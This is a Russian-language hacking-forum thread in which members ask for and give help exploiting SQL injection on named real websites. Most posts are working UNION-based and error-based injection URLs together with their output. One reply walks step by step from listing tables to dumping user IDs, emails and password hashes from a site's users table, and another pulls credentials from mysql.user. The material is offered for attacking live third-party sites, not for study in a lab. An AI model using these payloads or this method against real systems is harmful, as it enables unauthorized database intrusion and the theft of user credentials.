Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Потому что там двойной запрос. Надоели такие вопросы, появляются постоянно! Учите мат. часть.


    Зачем же так, когда все делается намного проще:
    http://www.oaontc.ru/node/243?SysNum=137159+and+1=2+union+select+1,version(),3,4,5--+
    4.1.25-log
     
  2. genzome

    genzome New Member

    Joined:
    21 Apr 2011
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    http://www.oaontc.ru/node/243?SysNum=-13+union+select+1,version%28%29,3,4,5--


    А так не проще? или я чегото не догоняю?
     
    1 person likes this.
  3. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Похоже что это sql-inj
    Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?
    http://www.cue.ru/catalog.php?pid=1'
     
  4. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    pid=1)+order+by+1/*

    upd:
    HTML:
    http://www.cue.ru/catalog.php?pid=1)+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)a+group+by+mid(concat_ws(0x3a,version(),user(),database()),floor(rand(0)*2),64))/*
    4.1.15-Debian_1-log:qp_newcue@localhost:qp_newcue
     
    #16564 M_script, 23 Apr 2011
    Last edited: 23 Apr 2011
    3 people like this.
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Раз такая пьянка, тогда можно и так:
    Code:
    http://www.oaontc.ru/node/243?SysNum=(0)union+select(version())--+
     
    _________________________
    #16565 Expl0ited, 23 Apr 2011
    Last edited: 23 Apr 2011
    1 person likes this.
  6. recfrf

    recfrf Member

    Joined:
    22 Aug 2008
    Messages:
    21
    Likes Received:
    6
    Reputations:
    0
    что можно придумать если запрос в котором есть точка обрезается после неё, те невозможно получить информацию к примеру из information_schema.tables получается information_schema все что после режется.
     
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Таблицы брутить, колонки пробовать вывести через ошибки.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ подскажите пожалуйста как дальше разкручивать подобный скуль
    http://www.photoclub.com.ua/rubric/?id=34' union select 1 from rubric where 1='
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    SQL error: Duplicate entry '5.1.49-3-log1' for key 'group_key'
     
    1 person likes this.
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ухты, спасибо, а вот ещо вопрос,
    столбцы подобраны правильно
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x75736572--

    а вот например вывести пароли из узер неполучается, почему?
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,Password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+user--
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    qaz

    from mysql.user
     
    _________________________
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    еще как можно :)
     
    _________________________
    1 person likes this.
  13. Crouch

    Crouch New Member

    Joined:
    16 Apr 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Есть сайт. Главная:
    http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1

    Подскажите как можно нарыть уязвимости, на SQL Injection на ощупь не получаетс:

    http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=1' -ошибки не выдает
    http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2-1 - выкидывает на другую страницу.

    Если это фильтрация то каким способом можно ее обойти?
    p.s. Извините за возможно глупый вопрос.
     
    #16573 Crouch, 25 Apr 2011
    Last edited: 25 Apr 2011
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так тоже ничего не выводит
     
  15. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(user,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user--
     
    1 person likes this.
  16. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Запрос:
    HTML:
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x2e,table_schema,table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.tables+where+table_name+like+0x257573657225--+
    Результат:
    HTML:
    nw.phpbb_users,nw_mir.users,trvlr_forum.phpbb3users,trvlr_forum.phpbb_users,trvlr_top.users
    Выбираешь нужную таблицу. Для примера trvlr_top.users
    1) Узнаем колонки
    Запрос:
    HTML:
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x7573657273+AND+table_schema=0x7472766C725F746F70--+
    Результат:
    HTML:
    memberid,sitename,url,email,description,password,clicksin,clicksout,hits,date,passreset,passreset2,rank,id_kat,hosts,knopka,mail,open,all,status,users,ocenka,checker,login,chastota,fio,open_link,content,title,server,desc,keyword,time,chk_date,chk_result,is_new,is_violator,days_left,mail_sent,chk_attempts
    2) Выводим юзеров
    Запросы:
    HTML:
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+1+and+20--+
    HTML:
    http://harmony.naturalworld.ru/cart.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,memberid,email,password)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,18,19,20,21,22,23+from+trvlr_top.users+where+memberid+between+21+and+40--+
    и т.д.
     
    2 people like this.
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    А можно поинтерисоватся,
    http://www.photoclub.com.ua/rubric/?id=34'+or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x+group+by+concat(version() ,floor(rand(0)*2)))--+'

    я такой запрос вижу в первый раз, может мно хтото обьяснить што ето,
    особенно интерисует
    +or+(select+count(*)+from+(select+1+union+s elect+2+union+select+3)x

    и
    floor(rand(0)*2))
     
  18. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    Здесь есть Blind
    http://cls.tgl.ru/index.php?no_html=1&option=com_rss&feed=RSS2.0
    http://cls.tgl.ru/index.php?Itemid=106&option=com_content&task=blogsection&id=3
    http://cls.tgl.ru/index.php?option=com_rss&feed=RSS0.91&no_html=1
     
  19. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    https://forum.antichat.ru/showpost.php?p=407227&postcount=3
     
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Да что вы. Здесь нет SQL. Параметр обрабатывается функцией intval. Т е первые цифры сохраняються, а всё что идёт после них обрезаеться.
    Пример:
    Code:
    http://cls.tgl.ru/index.php?option=com_frontpage&Itemid=2'''')))) Пиши всё что угодно!
     
Thread Status:
Not open for further replies.